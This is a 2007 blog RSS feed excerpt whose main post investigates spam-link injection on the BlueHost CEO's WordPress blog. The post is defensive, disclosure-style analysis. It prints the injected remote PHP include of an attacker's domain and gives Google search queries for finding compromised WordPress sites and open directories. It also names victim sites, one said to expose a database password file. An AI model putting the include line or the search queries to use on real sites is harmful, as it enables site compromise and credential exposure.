			<wfw:commentRss>http://42.kaizeku.com/google/matt-cutts-guide-on-labeling-image-attributes-search-engine-optimizations-tips/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Every Stupid Thing, We Did First - Bill Gates</title>
		<link>http://42.kaizeku.com/news/every-stupid-thing-we-did-first-bill-gates/</link>
		<comments>http://42.kaizeku.com/news/every-stupid-thing-we-did-first-bill-gates/#comments</comments>
		<pubDate>Sat, 08 Dec 2007 20:26:01 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[News]]></category>

		<category><![CDATA[bill+gates]]></category>

		<category><![CDATA[microsoft]]></category>

		<category><![CDATA[snook]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/news/every-stupid-thing-we-did-first-bill-gates/</guid>
		<description><![CDATA[<span class="vcard"><a href="http://www.snook.ca/jonathan/about/" class="url fn">Jonathan Snook</a></span> is having a good evening at Mix'n'mash Conferences 2007. His simple question spurs out hilarious response from <strong>bill gates</strong>.  Read all the <a href="http://www.snook.ca/archives/conferences/mixnmash2007/">transcript</a> at snook.ca.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><span class="vcard"><a href="http://www.snook.ca/jonathan/about/" class="url fn">Jonathan Snook</a></span> is having a good evening at Mix&#8217;n'mash Conferences 2007. His simple question spurs out hilarious response from <strong>bill gates</strong>. Read all the <a href="http://www.snook.ca/archives/conferences/mixnmash2007/">transcript</a> at snook.ca.<br />
<span id="more-72"></span></p>
<p><a href="http://www.shareapic.net/content.php?id=4742605&#038;owner=noah" rel="nofollow tag"><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/bill-quote-at-mixnmash-2007-conferences.jpg' alt='bill quote at mixnmash 2007 conferences' /></a></p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/news/every-stupid-thing-we-did-first-bill-gates/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</title>
		<link>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/</link>
		<comments>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/#comments</comments>
		<pubDate>Sat, 01 Dec 2007 09:55:53 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[class-mail]]></category>

		<category><![CDATA[cloacking]]></category>

		<category><![CDATA[DoS+Vulnerability]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[goro+spam]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[matt+heaton]]></category>

		<category><![CDATA[mick+jagger]]></category>

		<category><![CDATA[milw0rm]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[RealTime+Streaming+Protocol]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[RSTP]]></category>

		<category><![CDATA[script+injection]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/bluehost-hostmonster-ceo-hacked/</guid>
		<description><![CDATA[<img alt="bluehost hosmonster" src="http://i.kakkoi.net/blue-host-monster.png" title="bluehost hostmonster" style="float:left;margin: 0pt 5px 1px 0pt;" />Just after the recent issue on <a href="http://blog.kakkoi.net/uri/d3d3LmN3cmJsb2cubmV0LzQ4L3dvcmRwcmVzc2NvbWNuLWRlbGV0ZS11c2VyLWFjY291bnRzLXdpdGhvdXQtbm90aWNlcy5odG1s.curie,80,302">wordpress.com.cn</a> now there is new wordpress imitater. A remote spamware injection by <strong>wordpress.net.in</strong><p class="vcard">I was reading one of <a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie url fn"><span class="given-name">Matt</span> <span class="family-name">Heaton</span></a><a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie"> posted 2 days</a> ago when  I  found bunch of spamsware link on <a rev="mattheaton:blog" href="http://blog.kakkoi.net/wp-content/uploads/2007/12/mattheatoncom-wordpress-footer.png" title='view mattheaton.com wordpress footer'>his wordpress footer</a>.</p>
<p> Matt's is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to <tt>howardowens.com/?order=XX</tt> page</p>]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p class="notice mgb"><small>Dec 11 2007</small> - Matt Heaton Blog&#8217;s has been cleansed. ATM he&#8217;s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade. </p>
<p class="notice mgt mgb"><small>Jan 26th, 2008</small> - Seem like bluehost engineer did a bad job at cleaning, <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/">the goro spam is back</a>. </p>
<p><img alt="bluehost hosmonster" src="http://i.kakkoi.net/blue-host-monster.png" title="bluehost hostmonster" class="thumb- fl" />Just after the recent issue on <a href="http://blog.kakkoi.net/uri/d3d3LmN3cmJsb2cubmV0LzQ4L3dvcmRwcmVzc2NvbWNuLWRlbGV0ZS11c2VyLWFjY291bnRzLXdpdGhvdXQtbm90aWNlcy5odG1s.curie,80,302">wordpress.com.cn</a> now there is new wordpress imitater. A remote spamware injection by <strong>wordpress.net.in</strong>
<p class="vcard">I was reading one of <a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie url fn"><strong class="given-name" style="font-weight:400">Matt</strong> <strong class="family-name" style="font-weight:400">Heaton</strong></a><a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie"> posted 2 days</a> ago when I found bunch of spamsware link on <a rev="mattheaton:blog" href="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/mattheatoncom-wordpress-footer.png" title='view mattheaton.com wordpress footer'>his wordpress footer</a>.</p>
<p stle="text-align:right" class="cb"><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY5MTczNA.curie,80,302" rel="nofollow" rev="sharepic:mattheatonfooter"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004691734.png" class="fr" alt="mattheaton.com bluehost ceo hack wordpress footer" width="130" height="68" /></a></p>
<p> Matt&#8217;s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to <tt>howardowens.com/?order=XX</tt> page.</p>
<h3 id="lookup-results" style="margin-top:36px">Lookup for howardowens.com</h3>
<p>The below diagram explained the lookup results for <a href="http://www.howardowens.com">howardowens.com</a>. <small>click on the image to enlarge.</small></p>
<p><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/lookup-results-for-howardowens-com.png' title='lookup results for howardowens-com'><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/lookup-results-for-howardowens-com.thumbnail.png' alt='lookup results for howardowens-com' /></a><br />
Surprisingly the <span style="text-decoration:line-through">spammer</span> website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).
</p>
<p><span id="more-44"></span></p>
<h2 id="tracking-summary" style="margin-top:18px; border-top: 1px solid #ccc; padding-top:18px" class="sumarry">
Tracking the spam sources.<br />
</h2>
<div class="description">
<p><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY2OTg1Mw.curie,80,302" rel="nofollow" title="MattHeaton.com Blog Hacked Screenshot"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669853.png" alt="mattheaton.com hacked" width="15" height="130" class="fl" /></a>Viewing <span class="vcard"><a href="view-source:http://mattheaton.com" class="url fn org">mattheaton.com</a></span> html sources I found some hint and start searching for <tt style="background-color:#fff7c7;color:#333;padding:3px">xanax intext:id=\&#8221;goro\&#8221;</tt>. Google return <a href="http://www.google.com/search?q=xanax+intext%3Aid%3D%5C%22goro%5C%22" rel="external nofollow robots-nofollow" rev="google:result">2 results</a> for this query. </p>
<dl id="meta-search-results" class="google-query cb" style="line-height:1.6em">
<dt style="float:left;margin-right:3px;width:150px"><small>1.</small>&nbsp;Wordpress Support</dt>
<dd><a href="http://blog.kakkoi.net/uri/d29yZHByZXNzLm9yZy9zdXBwb3J0L3RvcGljLzEzOTQ1NQ.curie,80,302" rel="external" rev="wordpress:forum" title="php get footer adding spam code">php get footer adding spam code?</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:150px"><small>2.</small>&nbsp;elijahzarwan.net</dt>
<dd><a href="http://blog.kakkoi.net/uri/ZWxpamFoemFyd2FuLm5ldC9ibG9nLz9wPTQzMw.curie,80,302" rel="external nofollow robots-nofollow" class="curie" rev="elijahzarwan:entries" title="div id=&quot;goro&quot;"><strong style="font-weight:400">div id=”Goro”</strong></a> <small>(nice headline)</small>
</dl>
<p> Both site suggest same type of php injection methods<br />
<code lang="php"> include('http://wordpress.net.in/statcounter.php');</code>
</p>
<p>The statcounter.php is just normal text/plain full with spam links. The spam content on Matt Heaton blog is randomly generate from <strong>http://wordpress.net.in/</strong>[random]/ random = 1 - 9.</p>
</div>
<h2 id="raw-whois" style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Raw whois for wordpress.net.in</h2>
<pre class="prebox">
Domain ID:D2500581-AFIN
Domain Name:WORDPRESS.NET.IN
Created On:22-Apr-2007 12:01:55 UTC
Last Updated On:22-Jun-2007 02:26:40 UTC
Expiration Date:22-Apr-2008 12:01:55 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
Status:OK
Registrant ID:DI_4275224
Registrant Name:Mick Jagger
Registrant Organization:N/A
Registrant Street1:1 Red Square
Registrant City:Moscow
Registrant State/Province:Massachusetts
Registrant Postal Code:123592
Registrant Country:RU
Registrant Phone:+007.7581235641
Registrant Email:mkk.goro@bk.ru
Admin ID:DI_4275224
Admin Name:Mick Jagger
Admin Organization:N/A
Admin Street1:1 Red Square
Admin City:Moscow
Admin State/Province:Massachusetts
Admin Postal Code:123592
Admin Country:RU
Admin Phone:+007.7581235641
Admin Email:mkk.goro@bk.ru
Tech ID:DI_4275224
Tech Name:Mick Jagger
Tech Organization:N/A
Tech Street1:1 Red Square
Tech City:Moscow
Tech State/Province:Massachusetts
Tech Postal Code:123592
Tech Country:RU
Tech Phone:+007.7581235641
Tech Email:mkk.goro@bk.ru
Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM
</pre>
<p class="note" style="margin:10px;padding:10px;border:1px solid #eee">Note: The registrant address on <abbr title="1 red square, Moscow">1 red square</abbr> is a famous restaurant in Moscow.</p>
<p> Its pretty obvious that <tt>wordpress.net.in</tt> belong to registrar in India.</p>
<h2 style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Live example wordpress.net.in injection </h2>
<p> Google query for <tt style="background-color:#fff7c7;color:#444;padding:3px">warning &#8220;[function.include]&#8221; allintext: &#8220;wordpress.net.in&#8221; </tt> . Used <a href="http://blog.kakkoi.net/uri/d3d3LmZpZGRsZXJ0b29sLmNvbS9maWRkbGVyLw.curie,80,302" rel="nofollow external robots-nofollow" rev="fiddler:httpdump">fiddler</a> or any http-inspector to trace the full header request.
</p>
<dl id="meta-search-results-wordpress-net-in-inject" class="google-query" style="line-height:1.6em">
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>1</small>&nbsp;Evan Morris</dt>
<dd>Wordpress 2.0.6 | <a href="http://blog.kakkoi.net/uri/d3d3LndvcmQtZGV0ZWN0aXZlLmNvbS93b3JkcHJlc3MvP3A9MTIy.curie,80,302" rel="nofollow external robots-nofollow">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/wordpressnetin-goro-injection.png' title='wordpress.net.in goro injection'>screenshot</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>2</small>&nbsp;carwax</dt>
<dd>Wordpress 1.5.2 | <a href="http://blog.kakkoi.net/uri/YmxvZy5jYXJ3YXhwcm9kdWN0aW9ucy5jb20vP209MjAwNjAz.curie,80,302" rel="external nofollow" title="blog.carwaxproductions.com">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>3</small>&nbsp;aabenthus.biz</dt>
<dd>Wordpress 2.0.x | <a href="http://blog.kakkoi.net/uri/YWFiZW50aHVzLmJpeg.curie,80,302" rel="external nofollow robots-nofollow">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>4</small>&nbsp;mythinger.com</dt>
<dd>Wordpress 2.0.2 | <a href="http://209.85.173.104/search?q=cache:w5Sd6heMJL0J:johnboone.mythinger.com/+wordpress.net.in&#038;hl=en&#038;ct=clnk&#038;cd=21&#038;gl=us&#038;client=firefox-a">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/johnboonemythingercom-wordpressnetin.png' title='johnboone.mythinger.com wordpress.net.in'>screenshot</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>5</small>&nbsp;classicalanglican.net</dt>
<dd>Wordpress 2.0.2 | <a href="http://209.85.173.104/search?q=cache:fZb5-RNSGv0J:titusonenine.classicalanglican.net/%3Fp%3D13132+wordpress.net.in&#038;hl=en&#038;ct=clnk&#038;cd=22&#038;gl=us&#038;client=firefox-a" rel="external nofollow">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/titusonenineclassicalanglicannet-wordpressnetin.png' title='titusonenine.classicalanglican.net wordpress.net.in'>screenshot</a>
</dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>6</small>&nbsp;echo9er.net</dt>
<dd>WordPress 1.5.1 | <a href="http://blog.kakkoi.net/uri/d3d3LmVjaG85ZXIubmV0L2Jsb2cvP3A9MjQwMA.curie,80,302" rel="external nofollow">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>7</small>&nbsp;boyarick.com</dt>
<dd> Wordpress 2.0.2 | <a href="http://blog.kakkoi.net/uri/Ym95YXJpY2suY29tL2Jsb2cvP3A9MTM2.curie,80,302" rel="nofollow external robots-nofollow">url</a> | screenshot</dd>
</dl>
<h2 style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Google Directory search for class-mail.php</h2>
<p>Search for <strong>class-mail.php</strong> in open directory (public).<br />
<tt style="background:#fff7c7;color:#444;padding:3px">&#8220;parent directory&#8221; class-mail.php -html -htm –php -shtml -md5 -md5sums</tt></p>
<ul class="xoxo">
<li> <strong>jean-cyril.com</strong> - <a href="http://blog.kakkoi.net/uri/d3d3LmplYW4tY3lyaWwuY29tL3dwLWluY2x1ZGVzLw.curie,80,302" rel="nofollow external robots-nofollow" rev="wordpress:directory">wp-includes</a> &middot; spams link redirect to <tt>www.901am.com/?page=2157</tt>. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.</li>
<li> <strong>floaridablog.org</strong> - <a href="http://blog.kakkoi.net/uri/ZmxvcmlkYWJsb2cub3JnL3dvcmRwcmVzcy93cC1pbmNsdWRlcy8.curie,80,302" rel="nofollow external robots-nofollow" rev="wordpress:directory">wp-includes</a> &middot; spams redirect to <tt>communications.uml.edu/sunrise/?id=1076</tt> (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.</li>
</ul>
<h2 tyle="clear:both;margin-top:18px; padding-top:18px">Hiding from search engine Spiders</h2>
<p>First, I did some more comparative search at <a href="http://archive.org" rel="external" rev="webservices:alexa">archive.org</a> for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.</p>
<ul>
<li>http://web.archive.org/web/*/http://www.howardowens.com</li>
<li>http://web.archive.org/web/*/http://www.mattheaton.com</li>
</ul>
<p>Out of boredom I cloaked myself as the following agents.</p>
<ul>
<li>Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net</li>
<li>Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com</li>
<li>Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com</li>
<li>Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com
</ul>
<p>Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler &#038; spider from spying their joy-ride-spamhouse.
</p>
<h2 tyle="clear:both;margin-top:18px; padding-top:18px">Summary</h2>
<p>bits &#038; bytes from this accident we knew that</p>
<ul>
<li>Most of the site inject are running on wordpress 2.0.6 &#038; below</li>
<li><strong>allow_furl_open</strong> is set to true for this injection to work</li>
<li>Most of the blogs owner is unaware about the spams links (cloacking)</li>
</ul>
<p>Checkout Murray <a href="http://gmodules.com/ig/proxy?url=http://www.murrayc.com/blog/wp-content/uploads/2007/11/access_log.txt" rel="nofollow external" class="exturl icn-r" type="text/plain">access log</a>, it will give you some ideas with the remote injections methods.</p>
<h2>Update </h2>
<dl>
<dt>Dec 03 2007</dt>
<dd>All the spams link to <tt>howardowens.com</tt> page has been removed. I havent talk with howardowens but I assume howard&#8217;s site is being injected the same way like Matt Heaton blog.</dd>
<dt>Dec 04 2007</dt>
<dd>Mattheaton.com has a minor update, the spams now inject on both header and footer.<br />
<tt>tangonoticias.com:7070/d_pill/577.html</tt>.<br />
As tangonoticias.com is running on Joomla CMS they create a static &#8220;Wordpress&#8221; on port 7070 (Real Network Server &#038; RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. <a href="http://64.233.167.104/search?q=cache:xjPu95m8yEAJ:mattheaton.com&#038;hl=en&#038;ct=clnk&#038;cd=1&#038;gl=us">Google Cache</a> <small>(Nov 12)</small> </dd>
<dt>Dec 11 2007</dt>
<dd>Matt heaton has been purified. He&#8217;s now using latest version of Wordpress (2.3.1). You can still view it on cached thought &#038; <a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY2OTg1Mw.curie,80,302" rel="nofollow external" rev="sharepic:gallery">screenshot</a>. </dd>
</dl>
<h2>Related Post</h2>
<ul class="xoxo">
<li><a href="wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/"> How to Removed wordpress.net.in Spam Injection</a></li>
<li><small>Jan 31st, 2008</small> - <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/">Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</a></li>
</ul>
<h2 id="related-entries" class="mgb-">External Links</h2>
<ul class="xoxo pdt exturl">
<li><a href="http://www.mattheaton.com">Bluehost Hostmonster CEO&#8217;s blog</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3LnJvYnRleC5jb20vZG5zL3dvcmRwcmVzcy5uZXQuaW4uaHRtbA.curie,80,302" rev="robtex:lookup" rel="nofollow external robots-nofollow" title="Lookup via robtext">DNS Lookup results for wordpress.net.in</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3LmFib3V0dXMub3JnL01hdHRIZWF0b24uY29t.curie,80,302" rel="external nofollow robots-nofollow" rev="aboutus:mattheaton" title="View mattheaon.com wiki on Aboutus.org">Aboutus.org wiki on MattHeaton.com</a></li>
<li><a href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" rel="external nofollow robots-nofollow" rev="nvd:cve2006-4743" class="curie" title="National Vulnerabilities Database CVE 2006-4743">National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities</a></li>
<li><a href="http://blog.kakkoi.net/uri/d3d3Lm11cnJheWMuY29tL2Jsb2cvcGVybWFsaW5rLzIwMDcvMTEvMTYvbXktd29yZHByZXNzLWNyYWNrZWQv.curie,80,302" rel="external nofollow robots-nofollow" rev="wordpress:hacked" title="My Wordpress Cracked">Murray&#8217;s Blog My Wordpress Cracked</a></li>
<li><a href="http://pseudo-flaw.net/log/20/more-random-wordpress-blogs-and-al-gore-owned-by-seo-spammers">pseudo-flaw - more random wordpress blogs owned by seo spammers</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
